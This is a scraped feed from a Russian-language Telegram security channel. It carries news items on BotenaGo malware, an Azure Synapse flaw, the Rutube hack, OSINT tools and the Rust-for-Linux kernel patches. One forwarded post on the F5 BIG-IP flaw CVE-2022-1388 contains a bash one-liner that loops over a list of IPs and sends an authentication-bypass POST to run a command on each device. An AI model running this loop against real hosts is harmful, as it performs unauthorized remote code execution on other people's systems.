New BotenaGo Malware Variant Executes Stealth Attacks Against DVR Devices
▶️ Источник
Дневник Безопасника 🛡
▶️ Источник
Дневник Безопасника 🛡
LHN
New BotenaGo Malware Variant Executes Stealth Attacks Against DVR Devices
Researchers have detected a new variant of the BotenaGo malware attacking DVR devices. This malware previously caught attention when it targeted IoT devices. Now, it seems the malware has improved to target DVR systems while
Lupo — Malware IOC Extractor
Отладочный модуль для автоматизации анализа вредоносных программ. Пошаговую инструкцию по использованию Lupo с изображениями и инструкциями ознакомиться здесь.
https://github.com/malienist/lupo
Дневник Безопасника 🛡
Отладочный модуль для автоматизации анализа вредоносных программ. Пошаговую инструкцию по использованию Lupo с изображениями и инструкциями ознакомиться здесь.
https://github.com/malienist/lupo
Дневник Безопасника 🛡
Medium
Lupo — Malware IOC Extractor
Debugging module for Malware Analysis Automation
Forwarded from iMelnik
Twitter гремит о CVE-2022-1388 она же RCE в F5 BIG-IP(сервиса для доставки приложений).
Всё гениальное как и всегда оказалось простым, POST запрос и JSON...🤭
пример простого скрипта чтобы пробежаться по множеству IP и проверить их на уязвимость ;)
ну и сам PoC для тех кому интересно
Всё гениальное как и всегда оказалось простым, POST запрос и JSON...🤭
пример простого скрипта чтобы пробежаться по множеству IP и проверить их на уязвимость ;)
cat ips.txt | while read ip; do curl -su admin -H "Content-Type: application/json" http://$ip/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}';doneну и сам PoC для тех кому интересно
A vulnerability (CVE-2022-29972) in Microsoft Azure Synapse and Azure Data Factory could have led to remote code execution attacks, allowing attackers to gain control of other Synapse workspaces and leak sensitive data, including Azure service keys and API tokens, as well as passwords for other services.
▶️ Источник
Дневник Безопасника 🛡
▶️ Источник
Дневник Безопасника 🛡
Минцифры РФ создаст пул вендоров по закупке нужного количества серверов
▶️ Источник
Дневник Безопасника 🛡
▶️ Источник
Дневник Безопасника 🛡
CISOCLUB
Минцифры РФ создаст пул вендоров по закупке нужного количества серверов
Минцифры РФ сформирует перечень вендоров-провайдеров, ответственных за приобретение нужного объема серверов для отечественных ИТ-компаний. С соответствующим заявлением выступил вице-премьер Дмитрий Чернышенко, сообщает ТАСС. «Минцифры РФ создаёт сейчас пул…
The Village: Rutube «не подлежит восстановлению» после хакерской атаки
▶️ Источник
Дневник Безопасника 🛡
▶️ Источник
Дневник Безопасника 🛡
SecurityLab.ru
The Village: Rutube «не подлежит восстановлению» после хакерской атаки
По данным источников издания, в результате атаки код сайта был полностью удален.
Filesharing Search Engines
Сегодня в моей коллекции инструментов для osint появился новый раздел с поисковыми системами для файлообменных сайтов, торрентов, FTP-серверов, IRC-каналов и других файлообменных сайтов.
https://github.com/cipher387/osint_stuff_tool_collection#filesharingsearchengines
Дневник Безопасника 🛡
Сегодня в моей коллекции инструментов для osint появился новый раздел с поисковыми системами для файлообменных сайтов, торрентов, FTP-серверов, IRC-каналов и других файлообменных сайтов.
https://github.com/cipher387/osint_stuff_tool_collection#filesharingsearchengines
Дневник Безопасника 🛡
GitHub
GitHub - cipher387/osint_stuff_tool_collection: A collection of several hundred online tools for OSINT
A collection of several hundred online tools for OSINT - cipher387/osint_stuff_tool_collection
Forwarded from ITc | наука и технологии
Шестая версия патчей для ядра Linux с поддержкой языка Rust
Мигель Охеда (Miguel Ojeda), автор проекта Rust-for-Linux, предложил для рассмотрения разработчиками ядра Linux выпуск v6 компонентов для разработки драйверов устройств на языке Rust. Это седьмая редакция патчей с учётом первого варианта, опубликованного без номера версии.
Поддержка Rust рассматривается как экспериментальная, но уже включена в ветку linux-next и достаточно развита для начала работы по созданию слоёв абстракции над подсистемами ядра, а также для написания драйверов и модулей. Разработка финансируется компанией Google и организацией ISRG (Internet Security Research Group), которая является учредителем проекта Let's Encrypt и способствует продвижению HTTPS и развитию технологий для повышения защищённости интернета.
В новой версии:
- Инструментарий и вариант библиотеки alloc, избавленный от возможных генераций состояния "panic" при возникновении ошибок, обновлены до выпуска Rust 1.60, в которой стабилизирована поддержка режима "maybeuninitextra", применяемого в патчах к ядру.
- Добавлена возможность выполнения тестов из документации (тесты, одновременно используемые в качестве примеров в документации), через преобразование во время компиляции тестов, завязанных на API ядра, в тесты KUnit, выполняемые во время загрузки ядра.
- Приняты требования, в соответствии с которыми тесты не должны приводить к выводу предупреждения линтера Clippy, как и код для ядра на языке Rust.
и многое другое.
Предложенные изменения дают возможность использовать Rust в качестве второго языка для разработки драйверов и модулей ядра. Поддержка Rust преподносится как опция, не активная по умолчанию и не приводящая к включению Rust в число обязательных сборочных зависимостей к ядру. Использование Rust для разработки драйверов позволит с минимальными усилиями создавать безопасные и более качественные драйверы, избавленные от таких проблем как обращение к области памяти после её освобождения, разыменование нулевых указателей и выход за границы буфера.
Мигель Охеда (Miguel Ojeda), автор проекта Rust-for-Linux, предложил для рассмотрения разработчиками ядра Linux выпуск v6 компонентов для разработки драйверов устройств на языке Rust. Это седьмая редакция патчей с учётом первого варианта, опубликованного без номера версии.
Поддержка Rust рассматривается как экспериментальная, но уже включена в ветку linux-next и достаточно развита для начала работы по созданию слоёв абстракции над подсистемами ядра, а также для написания драйверов и модулей. Разработка финансируется компанией Google и организацией ISRG (Internet Security Research Group), которая является учредителем проекта Let's Encrypt и способствует продвижению HTTPS и развитию технологий для повышения защищённости интернета.
В новой версии:
- Инструментарий и вариант библиотеки alloc, избавленный от возможных генераций состояния "panic" при возникновении ошибок, обновлены до выпуска Rust 1.60, в которой стабилизирована поддержка режима "maybeuninitextra", применяемого в патчах к ядру.
- Добавлена возможность выполнения тестов из документации (тесты, одновременно используемые в качестве примеров в документации), через преобразование во время компиляции тестов, завязанных на API ядра, в тесты KUnit, выполняемые во время загрузки ядра.
- Приняты требования, в соответствии с которыми тесты не должны приводить к выводу предупреждения линтера Clippy, как и код для ядра на языке Rust.
и многое другое.
Предложенные изменения дают возможность использовать Rust в качестве второго языка для разработки драйверов и модулей ядра. Поддержка Rust преподносится как опция, не активная по умолчанию и не приводящая к включению Rust в число обязательных сборочных зависимостей к ядру. Использование Rust для разработки драйверов позволит с минимальными усилиями создавать безопасные и более качественные драйверы, избавленные от таких проблем как обращение к области памяти после её освобождения, разыменование нулевых указателей и выход за границы буфера.
